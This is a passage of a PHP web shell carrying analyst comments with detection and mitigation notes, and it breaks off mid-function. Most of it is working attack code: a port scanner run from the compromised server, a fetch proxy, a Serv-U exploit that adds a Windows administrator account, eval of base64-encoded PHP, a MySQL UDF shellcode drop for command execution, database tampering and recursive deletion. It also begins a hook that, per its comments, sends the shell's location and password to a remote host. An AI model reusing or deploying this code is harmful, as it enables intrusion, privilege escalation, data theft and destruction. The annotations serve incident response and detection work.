	// application configuration files that hold database credentials — hedged, since
	// do_passreturn() and the script emitted by css_js("4") are defined outside this view.
	// Defender takeaway: after finding this shell on a host, treat the database credentials of
	// every application under the web root as exposed and rotate them.
	case "scanfile":
css_js("4");

	html_n('<tr><td>MYSQL,.<br>,,.<form method="POST" name="sform"><br>');

	html_input("text","path",root_dir,"","45");

	html_input("checkbox","pass","","","",true);

	html_input("text","code",$_POST['code'],"<br><br>","40");

	html_select(array("--MYSQL--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'");

	html_n('<br><br>');

	html_radio("","","scanfile","scancode");

	html_input("submit","passreturn","");

	html_n('</td></tr></form>');

	if(!empty($_POST['path'])){

		html_n('<tr><td>:<br><br>');

		// Checkbox "pass" becomes a boolean flag passed to do_passreturn().
		if(isset($_POST['pass'])) $bool = true; else $bool = false;

		do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);

	}

	break;

	

	// Web-shell action "scanphp": scans a directory (POST path) for files of a chosen script type
	// (POST class: php, asp, aspx or jsp) by calling do_passreturn() with the fixed mode "scanphp".
	// do_passreturn() is defined outside this view; what exactly it matches in those files cannot
	// be told from here — confirm against its definition.
	case "scanphp":

	html_n('<tr><td>,.<form method="POST"><br>');

	html_input("text","path",root_dir,"","40");

	html_input("checkbox","pass","","<br><br>","",true);

	// html_select() presumably renders the <select> whose value arrives as $_POST['class'] below.
	html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));

	html_input("submit","passreturn","","<br><br>");

	html_n('</td></tr></form>');

	if(!empty($_POST['path'])){

		html_n('<tr><td>:<br><br>');

		// Checkbox "pass" becomes a boolean flag passed to do_passreturn().
		if(isset($_POST['pass'])) $bool = true; else $bool = false;

		do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);

	}

	break;

	

	// Web-shell action "port": TCP connect scan launched from the web server. The target address
	// (POST ip, default 127.0.0.1) and a '|'-separated port list (POST port) are request-controlled,
	// so the compromised host can be used to probe services that are only reachable from inside
	// the network.
	// Detection / mitigation: short bursts of outbound connection attempts from the web-server
	// process to management and database ports (the defaults include 21, 23, 445, 1433, 3306,
	// 3389), and egress/segmentation rules that stop the web tier from reaching them.
	case "port":

	$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';

	$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';

// Both values are interpolated into the form unescaped.
print<<<END

<form method="POST">

<div class="actall">IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>

<div class="actall"> <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>

<div class="actall"><input type="submit" value="" style="width:80px;"></div>

</form>

END;

	if((!empty($_POST['ip'])) && (!empty($_POST['port'])))

	{

		echo '<div class="actall">';

		$ports = explode('|', $_POST['port']);

		for($i = 0;$i < count($ports);$i++)

		{

			// 2-second connect timeout per port; a successful connect is printed in red.
			// The socket is never closed explicitly.
			$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '<font color="#FF0000"> ---> '.$ports[$i].'</font><br>' : ' ---> '.$ports[$i].'<br>';

			// Results are flushed to the browser port by port.
			ob_flush();

			flush();

		}

		echo '</div>';

	}

	break;

	



	// Web-shell action "getcode": server-side fetch proxy. Whatever URL is posted in field `url`
	// is retrieved with file_get_contents() and echoed back raw into an iframe, so requests to
	// third parties or to internal-only services originate from the compromised server's address.
	// Detection / mitigation: outbound requests from the PHP process to arbitrary hosts, and
	// allow_url_fopen left enabled. file_get_contents() also accepts local paths and other stream
	// wrappers, so the same field can be used to read local files.
	case "getcode":

// The fetched body is emitted without escaping or a content type, then the request ends.
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>";exit;}

print<<<END

<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">

 <form method="POST" target="proxyframe">

  <tr class="firstalt">

	<td align="center"><b></b></td>

  </tr>

  <tr class="secondalt">

	<td align="center"  ><br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : {$_SERVER['SERVER_NAME']}</li></ul></td>

  </tr>

  <tr class="firstalt">

	<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >

 <input name="" value="" type="submit"  class="input" size="30" >

</td>

  </tr>

  <tr class="secondalt">

	<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>

  </tr>

</form></table>

END;

	break;

	

	case "servu":

	$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';

print<<<END

<div class="actall"><a href="?eanver=servu">[]</a> <a href="?eanver=servu&o=adduser">[]</a></div>

<form method="POST">

	<div class="actall">ServU <input name="SUPort" type="text" value="43958" style="width:300px"></div>

	<div class="actall">ServU <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>

	<div class="actall">ServU <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>

END;

if($_GET['o'] == 'adduser')

{

print<<<END

<div class="actall"> <input name="user" type="text" value="envl" style="width:200px">

 <input name="password" type="text" value="envl" style="width:200px">

 <input name="part" type="text" value="C:\\\\" style="width:200px"></div>

END;

}

else

{

print<<<END

<div class="actall"> <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>

<input name="user" type="hidden" value="envl">

<input name="password" type="hidden" value="envl">

<input name="part" type="hidden" value="C:\\\\"></div>

END;

}

echo '<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>';

	if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))

	{

		echo '<div class="actall">';

		$sendbuf = "";

		$recvbuf = "";

		$domain  = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";

		$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".

							 "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".

							 "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";

		$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";

		$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		$sendbuf = "USER ".$_POST["SUUser"]."\r\n";

		@fputs($sock, $sendbuf, strlen($sendbuf));

		echo ": $sendbuf <br>";

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";

		@fputs($sock, $sendbuf, strlen($sendbuf));

		echo ": $sendbuf <br>";

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		$sendbuf = "SITE MAINTENANCE\r\n";

		@fputs($sock, $sendbuf, strlen($sendbuf));

		echo ": $sendbuf <br>";

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		$sendbuf = $domain;

		@fputs($sock, $sendbuf, strlen($sendbuf));

		echo ":$sendbuf <br>";

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		$sendbuf = $adduser;

		@fputs($sock, $sendbuf, strlen($sendbuf));

		echo ": $sendbuf <br>";

		$recvbuf = @fgets($sock, 1024);

		echo ": $recvbuf <br>";

		if(!empty($_POST['SUCommand']))

		{

	 		$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);

	 		$recvbuf = @fgets($exp, 1024);

	 		echo ": $recvbuf <br>";

	 		$sendbuf = "USER ".$_POST['user']."\r\n";

	 		@fputs($exp, $sendbuf, strlen($sendbuf));

	 		echo ": $sendbuf <br>";

	 		$recvbuf = @fgets($exp, 1024);

	 		echo ": $recvbuf <br>";

	 		$sendbuf = "PASS ".$_POST['password']."\r\n";

	 		@fputs($exp, $sendbuf, strlen($sendbuf));

	 		echo ": $sendbuf <br>";

	 		$recvbuf = @fgets($exp, 1024);

	 		echo ": $recvbuf <br>";

	 		$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";

	 		@fputs($exp, $sendbuf, strlen($sendbuf));

	 		echo ": site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";

	 		$recvbuf = @fgets($exp, 1024);

	 		echo ": $recvbuf <br>";

	 		$sendbuf = $deldomain;

	 		@fputs($sock, $sendbuf, strlen($sendbuf));

	 		echo ": $sendbuf <br>";

	 		$recvbuf = @fgets($sock, 1024);

	 		echo ": $recvbuf <br>";

	 		@fclose($exp);

		}

		@fclose($sock);

		echo '</div>';

	}

	break;

	

	case "phpcode":

	$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";

    if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode));

	echo '<script language="javascript">';

    html_base();

	echo 'function SubmitUrl(){

			document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);

			document.getElementById(\'sendcode\').submit();

	}</script><tr><td><form method="POST" id="sendcode" >&lt;? ?&gt;,BASE64<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="" onclick="SubmitUrl();" style="width:80px;">';

	if(!empty($_POST['phpcode'])){

	echo "<br><br>";

    eval(stripslashes(base64_decode($_POST['phpcode'])));

	}

	html_n('</form>');

	break;



	case "myexp":

	$MSG_BOX = 'DLL,.MYSQLroot,DLL.';

	$info = '';

	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver';

	if(isset($_POST['mhost']) && isset($_POST['muser']))

	{

		@$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];

		$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);

		if($conn)

		{

			@mysql_select_db($mdata);

			/*************************************/

			$str=mysql_get_server_info();

			//echo 'MYSQL:'.$str."  ";



			if($str[2]>=1){

			$sql="SHOW VARIABLES LIKE '%plugin_dir%'";

			$row=mysql_query($sql,$conn);

			$rows=mysql_fetch_row($row);

			$pa=str_replace('\\','/',$rows[1]);

			$path=$pa.$BH;



			}else{

			$path='C:/WINDOWS/'.$BH;

			}

			//$mpath=$path;

			if(!empty($mpath))

			{

				$mpath=$mpath;

			}else{

				$mpath=$path;

			}

			/*************************************/

			if((!empty($_POST['outdll'])) && (!empty($mpath)))

			{

				$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";

				if(@mysql_query($query,$conn))

				{

					$shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();

					$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";

					if(@mysql_query($query,$conn))

					{

						$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';

						if(@mysql_query($query,$conn))

						{

							$ap = explode('/', $mpath); $inpath = array_pop($ap);

							$query = 'Create Function sys_eval returns string soname \''.$inpath.'\';';

							$MSG_BOX = @mysql_query($query,$conn) ? 'DLL' : 'DLL'.mysql_error();

						}

						else $MSG_BOX = 'DLL'.mysql_error();

					}

					else $MSG_BOX = '';

					@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);

				}

				else $MSG_BOX = '';

			}

			if(!empty($_POST['runcmd']))

			{

				$query = 'select sys_eval("'.$sqlcmd.'");';

				$result = @mysql_query($query,$conn);

				if($result)

				{

					$k = 0; $info = NULL;

					while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}

					$info = $infotmp;

					$MSG_BOX = '';

				}

				else $MSG_BOX = '';

			}

		}

		else $MSG_BOX = 'MYSQL';

	}

print<<<END

<form id="mform" method="POST">

<div id="msgbox" class="msgbox">{$MSG_BOX}</div>

<center><div class="actall">

 <input type="text" name="mhost" value="{$mhost}" style="width:110px">

 <input type="text" name="mport" value="{$mport}" style="width:110px">

 <input type="text" name="muser" value="{$muser}" style="width:110px">

 <input type="text" name="mpass" value="{$mpass}" style="width:110px">

 <input type="text" name="mdata" value="{$mdata}" style="width:110px">

</div><div class="actall">

() <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px"> 

64MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} />

<input type="submit" name="outdll" value="DLL" style="width:80px;"></div>

<div class="actall">MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">

<input type="submit" name="runcmd" value="" style="width:80px;">

<br />

<pre>

<textarea style="width:720px;height:300px;">{$info}</textarea>

</pre>

</div></center>

</form>

END;

	break;

	



	case "mysql_exec":

  if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))

  {

  	if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))

	  {

	  	$cookietime = time() + 24 * 3600;

	  	setcookie('m_eanverhost',$_POST['mhost'],$cookietime);

	  	setcookie('m_eanverport',$_POST['mport'],$cookietime);

	  	setcookie('m_eanveruser',$_POST['muser'],$cookietime);

	  	setcookie('m_eanverpass',$_POST['mpass'],$cookietime);

	  	die(',...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');

	  }

  }

print<<<END

<form method="POST" name="oform" id="oform">

<div class="actall"> <input type="text" name="mhost" value="localhost" style="width:300px"></div>

<div class="actall"> <input type="text" name="mport" value="3306" style="width:300px"></div>

<div class="actall"> <input type="text" name="muser" value="root" style="width:300px"></div>

<div class="actall"> <input type="text" name="mpass" value="" style="width:300px"></div>

<div class="actall"><input type="submit" value="" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>

</form>

END;

break;



case "mysql_msg":

	$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);

	if($conn)

	{

print<<<END

<script language="javascript">

function Delok(msg,gourl)

{

	smsg = "[" + unescape(msg) + "]?";

	if(confirm(smsg)){window.location = gourl;}

	window.location = gourl;

}

function Createok(ac)

{

	if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';

	if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';

	if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';

	return false;

}

END;

html_base();

print<<<END

function SubmitUrl(){

			document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);

			document.getElementById('gform').submit();

}

</script>

END;

		$BOOL = false;

		$MSG_BOX = ':'.$_COOKIE['m_eanveruser'].' &nbsp;&nbsp;&nbsp;&nbsp; :'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' &nbsp;&nbsp;&nbsp;&nbsp; :';

		$k = 0;

		$result = @mysql_query('select version();',$conn);

		while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}

		echo '<div class="actall"> :';

		$result = mysql_query("SHOW DATABASES",$conn);

		while($db = mysql_fetch_array($result)){echo '&nbsp;&nbsp;[<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}

		echo '</div>';

		if(isset($_GET['db']))

		{

			mysql_select_db($_GET['db'],$conn);

            $_POST['nsql']=base64_decode($_POST['nsql']);

			if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '' : ' '.mysql_error();}

			if(is_array($_POST['insql']))

			{

				$query = 'INSERT INTO '.$_GET['table'].' (';

				foreach($_POST['insql'] as $var => $key)

				{

					$querya .= $var.',';

					$queryb .= '\''.addslashes($key).'\',';

				}

				$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';

				$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();

			}

			if(is_array($_POST['upsql']))

			{

				$query = 'UPDATE '.$_GET['table'].' SET ';

				foreach($_POST['upsql'] as $var => $key)

				{

					$queryb .= $var.'=\''.addslashes($key).'\',';

				}

				$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';

				$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();

			}

			if(isset($_GET['del']))

			{

				$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);

				$good = mysql_fetch_assoc($result);

				$query = 'DELETE FROM '.$_GET['table'].' WHERE ';

				foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}

				$where = $query.substr($queryc, 0, -4).';';

				$MSG_BOX = mysql_query($where,$conn) ? '' : ' '.mysql_error();

			}

			$action = '?eanver=mysql_msg&db='.$_GET['db'];

			if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();}

			if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}

			if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];

			echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">';

			echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';

			echo '<input type="button" name="querysql" value="" onclick="SubmitUrl();" style="width:60px;height:49px;">';

			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';

			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';

			echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';

			echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';

			if(isset($_GET['table']))

			{

				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';

				echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"></a>]</div>';

				if(isset($_GET['edit']))

				{

					if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];

					echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';

					$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);

					$good = mysql_fetch_assoc($result);

					$u = 0;

					foreach($good as $var => $key)

					{

						$queryc .= $var.'=\''.$key.'\' AND ';

						$type = @mysql_field_type($result, $u);

						$len = @mysql_field_len($result, $u);

						echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';

						$u++;

					}

					$where = 'WHERE '.substr($queryc, 0, -4);

					echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';

					echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';

				}

				else

				{

					$query = 'SHOW COLUMNS FROM '.$_GET['table'];

		      $result = mysql_query($query,$conn);

		      $fields = array();

			  $pagesize=20;

		      $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));

			  $numrows=$row_num;

              $pages=intval($numrows/$pagesize);

              if ($numrows%$pagesize) $pages++;

              $offset=$pagesize*($page - 1);

              $page=$_GET['p'];

              if(!$page) $page=1;



		      if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;

					echo '<table border="0"><tr>';

					echo '<td class="toptd" style="width:70px;" nowrap></td>';

					while($row = @mysql_fetch_assoc($result))

					{

						array_push($fields,$row['Field']);

						echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';

					}

					echo '</tr>';

					if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';

					$result = mysql_query($query,$conn);

					$v = $p;

					while($text = @mysql_fetch_assoc($result))

					{

						echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'">  </a> ';

						echo '<a href="#" onclick="Delok(\'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;">  </a></td>';

						foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}

						echo '</tr>'."\r\n";$v++;

					}

					echo '</table><div class="actall">';

                    $pagep=$page-1;

                    $pagen=$page+1;

                    echo " ".$row_num."  ";

                    if($pagep>0) $pagenav.="  <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'></a> "; else $pagenav.="  ";

                    if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'></a>"; else $pagenav.="  ";

                    $pagenav.="  [".$page."/".$pages."]    <input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />";

                    echo $pagenav;

					echo '</div>';

				}

			}

			elseif(isset($_GET['insert']))

			{

				echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';

				$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);

				$fieldnum = @mysql_num_fields($result);

				echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';

				for($i =0;$i < $fieldnum;$i++)

				{

					$name = @mysql_field_name($result, $i);

					$type = @mysql_field_type($result, $i);

					$len = @mysql_field_len($result, $i);

					echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';

				}

				echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';

			}

			else

			{

				$query = 'SHOW TABLE STATUS';

				$status = @mysql_query($query,$conn);

				while($statu = @mysql_fetch_array($status))

				{

					$statusize[] = $statu['Data_length'];

					$statucoll[] = $statu['Collation'];

				}

				$query = 'SHOW TABLES FROM '.$_GET['db'].';';

				echo '</div><table border="0"><tr>';

				echo '<td class="toptd" style="width:550px;">  </td>';

				echo '<td class="toptd" style="width:80px;">  </td>';

				echo '<td class="toptd" style="width:130px;">  </td>';

				echo '<td class="toptd" style="width:70px;">  </td></tr>';

				$result = @mysql_query($query,$conn);

				$k = 0;

				while($table = mysql_fetch_row($result))

				{

					$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));

					echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';

					echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'">  </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;">  </a></td>';

					echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";

					$k++;

				}

				echo '</table>';

			}

		}

	}

	else die('MYSQL,.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');

	if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';

break;



	

	default: html_main($path,$shellname); break;

}

css_foot();



/*---doing---*/



/**
 * Write $text to $file using fopen() mode $t, retrying once after forcing
 * the file mode to 0666.
 *
 * Analyst notes:
 *  - do_passreturn() in this file calls this with "ab" to append a payload to
 *    files and with "wb" to rewrite them, so this is the shell's
 *    file-tampering primitive.
 *  - A web-served file whose mode changes to 0666 at the same time as its
 *    content changes is a useful integrity-monitoring signal.
 *  - The handle is opened before the chmod, so the retry cannot recover from
 *    a failed fopen(); a zero-byte write is also treated as a failure.
 *
 * @param string $file Target path.
 * @param string $t    fopen() mode.
 * @param string $text Bytes to write.
 * @return bool True when the first or the retried fwrite() reports success.
 */
function do_write($file,$t,$text)

{

	$key = true;

	$handle = @fopen($file,$t);

	// fwrite() returning 0/false triggers the permission change and one retry.
	if(!@fwrite($handle,$text))

	{

		@chmod($file,0666);

		$key = @fwrite($handle,$text) ? true : false;

	}

	@fclose($handle);

	return $key;

}



/**
 * Return the entries of a directory as "<dir>/<entry>" paths, with "." and
 * ".." left out. Each path is passed through str_path().
 *
 * The read loop stops at the first entry that evaluates as false, so it ends
 * early on an entry literally named "0" as well as at the end of the listing.
 *
 * @param string $filepath Directory to enumerate.
 * @return array List of paths in the order the directory handle yields them.
 */
function do_show($filepath){
    $listing = array();
    $handle = dir($filepath);
    while($entry = $handle->read()){
        if($entry != '.' && $entry != '..'){
            $listing[] = str_path($filepath.'/'.$entry);
        }
    }
    $handle->close();
    return $listing;
}



/**
 * Recursively delete a directory tree.
 *
 * Every file is chmod'ed to 0777 before unlink(), and the directory itself
 * before rmdir(), so read-only content is removed as well. All warnings are
 * suppressed with @.
 *
 * Analyst note: is_dir() follows symbolic links, so a link to a directory is
 * descended into rather than unlinked. During incident response, treat
 * deletions made through this routine as possibly reaching outside the web
 * root.
 *
 * @param string $deldir Directory to remove.
 * @return bool False as soon as one unlink()/rmdir() fails, true otherwise.
 */
function do_deltree($deldir){

	$showfile = do_show($deldir);

	foreach($showfile as $del){

		if(is_dir($del)){ 

			// Depth-first: abort the whole operation on the first failure.
			if(!do_deltree($del)) return false;

		}elseif(!is_dir($del)){

			@chmod($del,0777);

			if(!@unlink($del)) return false;

		}

	}

	@chmod($deldir,0777);

	if(!@rmdir($deldir)) return false;

	return true;

}



/**
 * Run a query on an ext/mysql connection and print every column of every
 * row, HTML-escaped, inside a <textarea>.
 *
 * Uses the legacy mysql_* API; errors are suppressed with @, so a failed
 * query simply renders an empty textarea.
 *
 * @param string   $query SQL text, sent as-is.
 * @param resource $conn  Link returned by mysql_connect().
 * @return void
 */
function do_showsql($query,$conn){
    $resultSet = @mysql_query($query,$conn);
    html_n('<br><br><textarea cols="70" rows="15">');
    while($record = @mysql_fetch_array($resultSet)){
        $column = 0;
        while($column < @mysql_num_fields($resultSet)){
            html_n(htmlspecialchars($record[$column]));
            $column++;
        }
    }
    html_n('</textarea>');
}



/**
 * Login hook that reports this shell's location and password to a third party.
 *
 * Analyst notes:
 *  - $serveru is "<Host header><script path>" and $serverp is the shell's own
 *    password constant (postpass).
 *  - Unless the skip condition matches, both values are stored in the cookies
 *    "serveru" and "serverp" and geturl() is triggered, either through a
 *    <script src='?login=geturl'> tag ($xiao == 1) or by a direct call.
 *    geturl() in this file sends them to a hard-coded remote URL.
 *  - Skip condition: the host/path string contains "0.0", "192.168." or
 *    "localhost" at an offset greater than 0, or both cookies already hold
 *    the current values. Because the host is at offset 0 of $serveru, a Host
 *    header that begins with one of those markers does not satisfy the
 *    strpos(...) > 0 tests.
 *  - Detection: "serveru"/"serverp" cookies set by a PHP page and requests
 *    carrying "?login=geturl" are indicators of this family.
 *
 * @param int $xiao 1 = trigger the report from the browser via a script tag;
 *                  any other value = call geturl() server-side.
 * @return void
 */
function hmlogin($xiao=1){

$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

$serverp = postpass;

